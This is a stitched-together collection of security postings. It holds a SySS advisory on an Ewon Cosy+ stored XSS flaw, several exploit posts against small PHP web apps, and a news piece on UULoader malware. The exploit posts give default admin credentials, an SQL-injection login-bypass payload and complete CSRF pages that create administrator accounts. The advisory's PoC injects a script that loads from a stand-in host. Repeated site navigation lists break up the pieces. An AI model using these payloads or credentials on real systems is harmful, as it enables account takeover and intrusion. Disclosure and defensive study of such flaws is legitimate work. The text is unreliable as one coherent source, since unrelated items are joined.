The Ewon Cosy+ is a VPN gateway used for remote access and maintenance in industrial environments. If login against the FTP service of the Cosy+ fails, the submitted username is saved in a log. This log is included in the Cosy+ web interface without neutralizing the content. As a result, an unauthenticated attacker is able to inject HTML/JavaScript code via the username of an FTP login attempt.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID:               SYSS-2024-016  
Product:                   Ewon Cosy+  
Manufacturer:              HMS Industrial Networks AB  
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3  
Tested Version(s):         Firmware Version: 21.2s7  
Vulnerability Type:        Improper Neutralization of Input During Web Page Generation (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-03-27  
Solution Date:             2024-07-18  
Public Disclosure:         2024-08-11  
CVE Reference:             CVE-2024-33893  
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to improper neutralization of input, an unauthenticated attacker  
is able to inject HTML and JavaScript code into the administrative  
web interface of the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If login against the FTP service of the Cosy+ fails, the submitted  
username is saved in a log.  
This log is included in the Cosy+ web interface without neutralizing  
the content.  
As a result, an unauthenticated attacker is able to inject  
HTML/JavaScript code via the username of an FTP login attempt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Login attempt against Cosy+ FTP service:  
     #> ftp "<script src=//x>"@192.168.10.33

2. JavaScript is included when visiting the event logs on Cosy+ web  
     interface (http://192.168.10.33/index.shtm#EVLogsTbl):

     <div class="x-grid-cell-inner " style="text-align:left;">  
         eftp-Close FTP session (User: <script src="//x">  
     </div">

Note:  
     The FTP username is limited to 16 characters and therefore the  
     payload length is limited too.  
     However, exploitation is still possible, e.g. by controlling  
     DNS responses or using short URLs, e.g. an emoji domain.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed  
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered  
2024-03-27: Vulnerability reported to manufacturer  
2024-04-02: Inquiry about the status  
2024-04-05: Manufacturer acknowlegded the vulnerability and started the  
             analysis  
2024-04-10: Two more vulnerabilities reported to the manufacturer  
             (SYSS-2024-032 and SYSS-2024-033)  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-15: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-15: Acknowlegded the remediation actions and asked the manufacturer  
             to assign a CVE ID  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website  
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet  
[2] SySS Security Advisory SYSS-2024-016  
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-016.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy  
[4] Manufacturer note  
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf  
[5] CVE-2024-33893  
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33893  
[6] Blog post  
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/  
[7] DEF CON talk  
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@syss.de  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay4vsACgkQrgyb+PE0  
i1M+GA//R3tvHZW7B21Kf+8aZcVONuL56yzPOyqEdISB0joFi9yvzGkqCJPYws5t  
vFojVlZT38COf64ZC2siFQCJrtOzMa+zWT3kpSeBFsNQ60Sx79UaCdQVa6GjpZm/  
8qSNWtCpOMGmj95FwYaHuZbKxiSifyIjsVteADqiaysWVx7kXapktPSD2KiOBJSp  
Ycg81WfRS10ELiUWoLZ5GTXhzQKzH0Tsh6h1qNHWy5GkHLwIQKkzicQ5wR1ZRzK4  
o6k8cJySgAqgJ3gmGU9iUUElppPXj7EFOK7m8q0ny5gQpQfz3dMPxJz5eK8zBazd  
1c9OjgdZNcgzschhKsl/JX+3YVGQzmNo5rSOIbJS4+7Oe0UcTaggzbgj80GGOakT  
vLC9GqmgYUsv+yr2Dp10pUg/plySeScDhYlkZ+VN9GDcEVodiKzM6wukj1eDEw0+  
6CzHKnGvKOa322AVnKF+xdB/c+sDCEaD73S47gt8CfG57J7bcpth3Gf9RkLtLFXC  
U3yiT7FmY/KH7WZvmnyhsk/Go66aGRy0d1hQl/tzdnBVdDn1IZToymnC/YVDxqxc  
Q9GsDhkpDOyozgrhUdef64RY5ZOzXcpNJvCM1RxjP65ZMxiPpZ0z/3IuGJ+DUWkM  
f8Sm21hfsgkq8UmnLtSnDCUyPTxJISTK9lwleYkqodqJrXUlUD0=  
=HV5Q  
-----END PGP SIGNATURE-----

Ewon Cosy+ Improper Neutralization / Cross Site Scripting

Lawyer CMS version 1.6 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Lawyer CMS 1.6 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/lawyer/                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/lawyer//adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Lawyer CMS 1.6 Insecure Settings

Karya Online Shopping Portal version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Karya Online Shopping Portal 2.0 auth by pass Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.shahsanjiv.com.np/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/shopping/ADMIN/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Karya Online Shopping Portal 2.0 SQL Injection

JobSeeker CMS version 1.5 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : JobSeeker CMS 1.5 Insecure Settings Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/jobseeker/                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/jobseeker/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

JobSeeker CMS 1.5 Insecure Settings

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

**Jobs Finder System 1.0 SQL Injection**

Posted Aug 19, 2024

Authored by indoushka

Jobs Finder System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 0e14944aabacd3bde55dc9ca768a85b25224b5d197aed3ef9cecb63e14d97575

Download | Favorite | View

**Jobs Finder System 1.0 SQL Injection**

    =============================================================================================================================================| # Title     : jobs Finder System v1.0 SQL injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /jobs.php?id=3 <=== inject here[+] http://127.0.0.1/jobportal-master/jobs.php?id=3 [+]  Login : http://127.0.0.1/jobportal-master/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Jobs Finder System 1.0 SQL Injection

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

**Human Resource Management System 2024 1.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Human Resource Management System 2024 version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | bf20205d0167adcb0c48749ed7a50372cba24a18938ecfb734926b5099542af1

Download | Favorite | View

**Human Resource Management System 2024 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = admin#123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Human Resource Management System 2024 1.0 Insecure Settings

Hotel Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Hotel Management System 1.0 CSRF Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

  [+] Line 27 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>User Registration</title>  
</head>  
<body>

    <h2>User Registration</h2>  
    <form id="userForm" enctype="multipart/form-data">  
        <label for="username">User Name:</label>  
        <input type="username" id="username" name="username" required><br><br>

        <label for="password">Password:</label>  
        <input type="password" id="password" name="password" required><br><br>

        <input type="button" value="Save User" onclick="saveUser()">  
    </form>

    <script>  
        function saveUser() {  
            var form = document.getElementById('userForm');  
            var formData = new FormData(form);

            var xhr = new XMLHttpRequest();  
            xhr.open("POST", "http://127.0.0.1/hotel/admin/ajax.php?action=save_user", true);

            xhr.onload = function () {  
                if (xhr.status === 200) {  
                    alert('User saved successfully');  
                } else {  
                    alert('An error occurred while saving the user');  
                }  
            };

            xhr.send(formData);  
        }  
    </script>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Hotel Management System 1.0 Cross Site Request Forgery

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

**Bhojon Restaurant Management System 3.0 Insecure Settings**

Posted Aug 19, 2024

Authored by indoushka

Bhojon Restaurant Management System version 3.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5040244ae54e0b0c8ba29ab2d3b854826d64f8640404907653ffda5ea3f38ca6

Download | Favorite | View

**Bhojon Restaurant Management System 3.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Bhojon restaurant management system v3.0 Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.bdtask.com/restaurant-management-system.php#live_demo                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@example.com & pass = 12345[+] https://www/127.0.0.1/gixrestaurantmy/dashboard/autoupdateGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,460)
*   Arbitrary (16,885)
*   BBS (2,859)
*   Bypass (1,867)
*   CGI (1,033)
*   Code Execution (7,823)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,398)
*   DoS (25,094)
*   Encryption (2,389)
*   Exploit (53,232)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (898)
*   Kernel (7,223)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,727)
*   Python (1,646)
*   Remote (31,673)
*   Root (3,638)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,029)
*   Shell (3,277)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,278)
*   SQL Injection (16,614)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,004)
*   Web (9,968)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,259)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,101)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,815)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,569)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,756)
*   UNIX (9,438)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Bhojon Restaurant Management System 3.0 Insecure Settings

Accounting Journal Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Accounting Journal Management System 1.0 CSRF Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.  [+] Line 6 : Set your target url[+] Line 15 + 19 : Set user & pass[+] save payload as poc.html [+] payload : <!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://127.0.0.1/ajms/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Accounting Journal Management System 1.0 Cross Site Request Forgery

A new type of malware called UULoader is being used by threat actors to deliver next-stage payloads like Gh0st RAT and Mimikatz.
The Cyberint Research Team, which discovered the malware, said it's distributed in the form of malicious installers for legitimate applications targeting Korean and Chinese speakers.
There is evidence pointing to UULoader being the work of a Chinese speaker due to the

Threat Intelligence / Cryptocurrency

A new type of malware called UULoader is being used by threat actors to deliver next-stage payloads like Gh0st RAT and Mimikatz.

The Cyberint Research Team, which discovered the malware, said it's distributed in the form of malicious installers for legitimate applications targeting Korean and Chinese speakers.

There is evidence pointing to UULoader being the work of a Chinese speaker due to the presence of Chinese strings in program database (PDB) files embedded within the DLL file.

"UULoader's 'core' files are contained in a Microsoft Cabinet archive (.cab) file which contains two primary executables (an .exe and a .dll) which have had their file header stripped," the company said in a technical report shared with The Hacker News.

One of the executables is a legitimate binary that's susceptible to DLL side-loading, which is used to sideload the DLL file that ultimately loads the final stage, an obfuscate file named "XamlHost.sys" that's nothing but remote access tools such as Gh0st RAT or the Mimikatz credential harvester.

Present within the MSI installer file is a Visual Basic Script (.vbs) that's responsible for launching the executable – e.g., Realtek – with some UULoader samples also running a decoy file as a distraction mechanism.

"This usually corresponds to what the .msi file is pretending to be," Cyberint said. "For example, if it tries to disguise itself as a 'Chrome update,' the decoy will be an actual legitimate update for Chrome."

This is not the first time bogus Google Chrome installers have led to the deployment of Gh0st RAT. Last month, eSentire detailed an attack chain targeting Chinese Windows users that employed a fake Google Chrome site to disseminate the remote access trojan.

The development comes as threat actors have been observed creating thousands of cryptocurrency-themed lure sites used for phishing attacks that target users of popular cryptocurrency wallet services like Coinbase, Exodus, and MetaMask, among others.

"These actors are using free hosting services such as Gitbook and Webflow to create lure sites on crypto wallet typosquatter subdomains," Broadcom-owned Symantec said. "These sites lure potential victims with information about crypto wallets and download links that actually lead to malicious URLs."

These URLs serve as a traffic distribution system (TDS) redirecting users to phishing content or to some innocuous pages if the tool determines the visitor to be a security researcher.

Phishing campaigns have also been masquerading as legitimate government entities in India and the U.S. to redirect users to phony domains that collect sensitive information, which can be leveraged in future operations for further scams, sending phishing emails, spreading disinformation/misinformation, or distributing malware.

Some of these attacks are noteworthy for the abuse of Microsoft's Dynamics 365 Marketing platform to create subdomains and send phishing emails, thereby slipping through email filters. These attacks have been codenamed Uncle Scam owing to the fact that these emails impersonate the U.S. General Services Administration (GSA).

Social engineering efforts have further cashed in on the popularity of the generative artificial intelligence (AI) wave to set up scam domains mimicking OpenAI ChatGPT to proliferate suspicious and malicious activity, including phishing, grayware, ransomware, and command-and-control (C2).

"Remarkably, over 72% of the domains associate themselves with popular GenAI applications by including keywords like gpt or chatgpt," Palo Alto Networks Unit 42 said in an analysis last month. "Among all traffic toward these \[newly registered domains\], 35% was directed toward suspicious domains."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows